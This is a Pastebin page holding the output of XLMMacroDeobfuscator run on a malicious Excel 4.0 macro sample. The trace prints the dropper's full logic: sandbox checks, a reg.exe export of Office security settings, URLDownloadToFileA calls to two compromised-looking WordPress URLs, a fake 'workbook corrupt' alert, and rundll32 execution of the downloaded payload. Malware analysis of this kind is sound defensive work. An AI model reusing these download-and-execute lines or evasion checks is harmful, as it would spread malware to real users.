Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\samples\xlm\6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1.xls
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\samples\xlm\6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1.xls
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'Sheet2'!$FS$52964
- [Starting Deobfuscation]
- CELL:FS52964 , FullEvaluation , SET.VALUE(GM52449,392)
- CELL:FS52965 , FullEvaluation , GOTO(CV24412)
- CELL:CV24412 , FullEvaluation , SET.VALUE(GQ44156,339)
- CELL:CV24413 , FullEvaluation , GOTO(GZ14878)
- CELL:GZ14878 , FullEvaluation , SET.VALUE(HG1271,1532)
- CELL:GZ14879 , FullEvaluation , GOTO(CJ53865)
- CELL:CJ53865 , FullEvaluation , SET.VALUE(AC30333,35.75)
- CELL:CJ53866 , FullEvaluation , GOTO(HO45111)
- CELL:HO45111 , FullEvaluation , SET.VALUE(CS46407,22)
- CELL:HO45112 , FullEvaluation , GOTO(GX48167)
- CELL:GX48167 , FullEvaluation , SET.VALUE(CI12245,-59)
- CELL:GX48168 , FullEvaluation , RUN(Sheet2!GG37317)
- CELL:GG37317 , FullEvaluation , SET.VALUE(U1115,-59)
- CELL:GG37318 , FullEvaluation , GOTO(BS37166)
- CELL:BS37166 , FullEvaluation , SET.VALUE(CN63602,-406)
- CELL:BS37167 , FullEvaluation , GOTO(X1129)
- CELL:X1129 , FullEvaluation , SET.VALUE(BH34689,127)
- CELL:X1130 , FullEvaluation , RUN(Sheet2!HV59960)
- CELL:HV59960 , FullEvaluation , SET.VALUE(BK21897,-353.7)
- CELL:HV59961 , FullEvaluation , RUN(Sheet2!GP29734)
- CELL:GP29734 , FullEvaluation , FORMULA("=CLOSE(FALSE)",FK4625)
- CELL:GP29735 , FullEvaluation , GOTO(EW24092)
- CELL:EW24092 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",EW24093)
- CELL:EW24093 , FullEvaluation , 0
- CELL:EW24094 , FullEvaluation , GOTO(IK5437)
- CELL:IK5437 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)",IK5438)
- CELL:IK5438 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)
- CELL:IK5439 , FullEvaluation , GOTO(HS48810)
- CELL:HS48810 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))",HS48811)
- CELL:HS48811 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))
- CELL:HS48812 , FullEvaluation , RUN(Sheet2!HL61953)
- CELL:HL61953 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)",HL61954)
- CELL:HL61954 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)
- CELL:HL61955 , FullEvaluation , GOTO(FT3448)
- CELL:FT3448 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)",FT3449)
- CELL:FT3449 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)
- CELL:FT3450 , FullEvaluation , RUN(Sheet2!IL4383)
- CELL:IL4383 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)",IL4384)
- CELL:IL4384 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)
- CELL:IL4385 , FullEvaluation , RUN(Sheet2!IC43412)
- CELL:IC43412 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)",IC43413)
- CELL:IC43413 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)
- CELL:IC43414 , FullEvaluation , GOTO(AU41565)
- CELL:AU41565 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))",AU41566)
- CELL:AU41566 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))
- CELL:AU41567 , FullEvaluation , RUN(Sheet2!AB17079)
- CELL:AB17079 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))",AB17080)
- CELL:AB17080 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))
- CELL:AB17081 , FullEvaluation , GOTO(IB27416)
- CELL:IB27416 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))",IB27417)
- CELL:IB27417 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))
- CELL:IB27417 , FullEvaluation , [TRUE]
- CELL:IB27418 , FullEvaluation , RUN(Sheet2!ED65281)
- CELL:ED65281 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",EN14779)
- CELL:ED65282 , FullEvaluation , GOTO(IR35245)
- CELL:IR35245 , FullEvaluation , FORMULA("=""C:\Users\Public\0tDOFd.reg""",HQ57664)
- CELL:IR35246 , FullEvaluation , GOTO(DW28906)
- CELL:DW28906 , FullEvaluation , FORMULA("=R[2390]C[112]&GET.WORKSPACE(2)&""\Excel\Security ""&R[45275]C[193]&"" /y""",AF12389)
- CELL:DW28907 , FullEvaluation , GOTO(G52328)
- CELL:G52328 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",AJ12831)
- CELL:G52329 , FullEvaluation , GOTO(GR56472)
- CELL:GR56472 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43642]C[-164],R[-44084]C[-168],0,5)",GR56473)
- CELL:GR56473 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\0tDOFd.reg /y",0,5)
- CELL:GR56474 , FullEvaluation , GOTO(BI831)
- CELL:BI831 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[56830]C[164])))",BI834)
- CELL:BI832 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",BI835)
- CELL:BI833 , FullEvaluation , FORMULA("=NEXT()",BI836)
- CELL:BI834 , PartialEvaluation , WHILE(ISERROR(FILES(R[56830]C[164])))
- CELL:BI837 , FullEvaluation , RUN(Sheet2!HX58625)
- CELL:HX58625 , FullEvaluation , FORMULA("=FOPEN(R[-962]C[-7])",HX58626)
- CELL:HX58626 , FullEvaluation , FOPEN("C:\Users\Public\0tDOFd.reg",1)
- CELL:HX58627 , FullEvaluation , RUN(Sheet2!H59022)
- CELL:H59022 , FullEvaluation , FORMULA("=FPOS(R[-397]C[224],215)",H59023)
- CELL:H59023 , PartialEvaluation , FPOS("C:\Users\Public\0tDOFd.reg",215)
- CELL:H59024 , FullEvaluation , RUN(Sheet2!HN6157)
- CELL:HN6157 , FullEvaluation , FORMULA("=FREAD(R[52468]C[10],255)",HN6158)
- CELL:HN6158 , PartialEvaluation , FREAD("C:\Users\Public\0tDOFd.reg",255)
- CELL:HN6159 , FullEvaluation , GOTO(M12701)
- CELL:M12701 , FullEvaluation , FORMULA("=FCLOSE(R[45924]C[219])",M12702)
- CELL:M12702 , PartialEvaluation , FCLOSE("C:\Users\Public\0tDOFd.reg")
- CELL:M12703 , FullEvaluation , GOTO(HS19468)
- CELL:HS19468 , FullEvaluation , FORMULA("=FILE.DELETE(R[38195]C[-2])",HS19469)
- CELL:HS19469 , PartialEvaluation , FILE.DELETE("C:\Users\Public\0tDOFd.reg")
- CELL:HS19470 , FullEvaluation , RUN(Sheet2!IP58689)
- CELL:IP58689 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)",IP58690)
- CELL:IP58690 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)
- CELL:IP58690 , FullEvaluation , [TRUE] GOTO(R[-54065]C[-83])
- CELL:FK4625 , End , CLOSE(FALSE)
- CELL:IP58690 , FullEvaluation , [FALSE]
- CELL:IP58691 , FullEvaluation , GOTO(IB46729)
- CELL:IB46729 , FullEvaluation , FORMULA("=""C:\Users\Public\Gqjxs.html""",GS57755)
- CELL:IB46730 , FullEvaluation , GOTO(CD35438)
- CELL:CD35438 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",EL60834)
- CELL:CD35439 , FullEvaluation , GOTO(CD16194)
- CELL:CD16194 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[44639]C[60],R[41560]C[119],0,0)",CD16195)
- CELL:CD16195 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\Gqjxs.html",0,0)
- CELL:CD16196 , FullEvaluation , GOTO(GD27718)
- CELL:GD27718 , FullEvaluation , FORMULA("=FILES(R[30036]C[15])",GD27719)
- CELL:GD27719 , PartialEvaluation , FILES("C:\Users\Public\Gqjxs.html")
- CELL:GD27720 , FullEvaluation , RUN(Sheet2!HU9549)
- CELL:HU9549 , FullEvaluation , FORMULA("=IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)",HU9550)
- CELL:HU9550 , FullBranching , IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)
- CELL:HU9550 , FullEvaluation , [TRUE] GOTO(R[-4925]C[-62])
- CELL:FK4625 , End , CLOSE(FALSE)
- CELL:HU9550 , FullEvaluation , [FALSE]
- CELL:HU9551 , FullEvaluation , GOTO(BH42792)
- CELL:BH42792 , FullEvaluation , SET.VALUE(CN33795,84)
- CELL:BH42793 , FullEvaluation , RUN(Sheet2!HH59901)
- CELL:HH59901 , FullEvaluation , SET.VALUE(DO31023,442)
- CELL:HH59902 , FullEvaluation , GOTO(FU9050)
- CELL:FU9050 , FullEvaluation , SET.VALUE(DW59946,36.8)
- CELL:FU9051 , FullEvaluation , RUN(Sheet2!CC60398)
- CELL:CC60398 , FullEvaluation , SET.VALUE(G42604,361)
- CELL:CC60399 , FullEvaluation , GOTO(IJ44508)
- CELL:IJ44508 , FullEvaluation , SET.VALUE(GB18553,484)
- CELL:IJ44509 , FullEvaluation , GOTO(GI32034)
- CELL:GI32034 , FullEvaluation , SET.VALUE(CW23831,-135.5)
- CELL:GI32035 , FullEvaluation , GOTO(D14697)
- CELL:D14697 , FullEvaluation , SET.VALUE(C63268,494)
- CELL:D14698 , FullEvaluation , GOTO(AZ42808)
- CELL:AZ42808 , FullEvaluation , SET.VALUE(F39004,235)
- CELL:AZ42809 , FullEvaluation , RUN(Sheet2!EB31800)
- CELL:EB31800 , FullEvaluation , SET.VALUE(GO1841,-203)
- CELL:EB31801 , FullEvaluation , GOTO(EG40361)
- CELL:EG40361 , FullEvaluation , SET.VALUE(AA4633,11)
- CELL:EG40362 , FullEvaluation , GOTO(IB20858)
- CELL:IB20858 , FullEvaluation , FORMULA("=""C:\Users\Public\8Z6V7u6.html""",BW44469)
- CELL:IB20859 , FullEvaluation , GOTO(DG24068)
- CELL:DG24068 , FullEvaluation , FORMULA("=""http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php""",BO49765)
- CELL:DG24069 , FullEvaluation , GOTO(ES45654)
- CELL:ES45654 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[37426]C[-87],R[32130]C[-79],0,0)",EX12339)
- CELL:ES45655 , FullEvaluation , RUN(Sheet2!DB59619)
- CELL:DB59619 , FullEvaluation , FORMULA("=FILES(R[27419]C[-152])",HS17050)
- CELL:DB59620 , FullEvaluation , GOTO(CH38558)
- CELL:CH38558 , FullEvaluation , FORMULA("=IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))",GF41632)
- CELL:CH38559 , FullEvaluation , RUN(Sheet2!FE42412)
- CELL:FE42412 , FullEvaluation , FORMULA("=""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",AM24439)
- CELL:FE42413 , FullEvaluation , RUN(Sheet2!GL58286)
- CELL:GL58286 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28190]C[-188],R[-8160]C[-152],0,0)",HS52629)
- CELL:GL58287 , FullEvaluation , RUN(Sheet2!D8257)
- CELL:D8257 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",FK27640)
- CELL:D8258 , FullEvaluation , GOTO(H50016)
- CELL:H50016 , FullEvaluation , FORMULA("=ALERT(R[22870]C[-4])",FO4770)
- CELL:H50017 , FullEvaluation , GOTO(FK5361)
- CELL:FK5361 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",BP21468)
- CELL:FK5362 , FullEvaluation , GOTO(HY30127)
- CELL:HY30127 , FullEvaluation , FORMULA("=R[24931]C[-64]&"",DllRegisterServer""",EI19538)
- CELL:HY30128 , FullEvaluation , GOTO(ES22445)
- CELL:ES22445 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2101]C[-9],R[171]C[62],0,5)",BY19367)
- CELL:ES22446 , FullEvaluation , RUN(Sheet2!EX12339)
- CELL:EX12339 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php","C:\Users\Public\8Z6V7u6.html",0,0)
- CELL:EX12340 , FullEvaluation , GOTO(HS17050)
- CELL:HS17050 , PartialEvaluation , FILES("C:\Users\Public\8Z6V7u6.html")
- CELL:HS17051 , FullEvaluation , GOTO(GF41632)
- CELL:GF41632 , FullBranching , IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))
- CELL:GF41632 , FullEvaluation , [TRUE]
- CELL:GF41633 , FullEvaluation , GOTO(AM24439)
- CELL:AM24439 , FullEvaluation , "https://neebank.com/wp-content/uploads/2020/05/wp-front.php"
- CELL:AM24440 , FullEvaluation , RUN(Sheet2!HS52629)
- CELL:HS52629 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://neebank.com/wp-content/uploads/2020/05/wp-front.php","C:\Users\Public\8Z6V7u6.html",0,0)
- CELL:HS52630 , FullEvaluation , RUN(Sheet2!FK27640)
- CELL:FK27640 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:FK27641 , FullEvaluation , RUN(Sheet2!FO4770)
- CELL:FO4770 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:FO4771 , FullEvaluation , GOTO(BP21468)
- CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BP21469 , FullEvaluation , GOTO(EI19538)
- CELL:EI19538 , FullEvaluation , "C:\Users\Public\8Z6V7u6.html,DllRegisterServer"
- CELL:EI19539 , FullEvaluation , GOTO(BY19367)
- CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\8Z6V7u6.html,DllRegisterServer",0,5)
- CELL:BY19368 , FullEvaluation , GOTO(FK4625)
- CELL:FK4625 , End , CLOSE(FALSE)
- CELL:GF41632 , FullEvaluation , [FALSE] RUN(Sheet2!FO4770)
- CELL:FO4770 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:FO4771 , FullEvaluation , GOTO(BP21468)
- CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BP21469 , FullEvaluation , GOTO(EI19538)
- CELL:EI19538 , FullEvaluation , "C:\Users\Public\8Z6V7u6.html,DllRegisterServer"
- CELL:EI19539 , FullEvaluation , GOTO(BY19367)
- CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\8Z6V7u6.html,DllRegisterServer",0,5)
- CELL:BY19368 , FullEvaluation , GOTO(FK4625)
- CELL:FK4625 , End , CLOSE(FALSE)
- CELL:IB27417 , FullEvaluation , [FALSE] GOTO(R[-22792]C[-69])
- CELL:FK4625 , End , CLOSE(FALSE)
- Files:
- [END of Deobfuscation]
- time elapsed: 6.9357006549835205
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement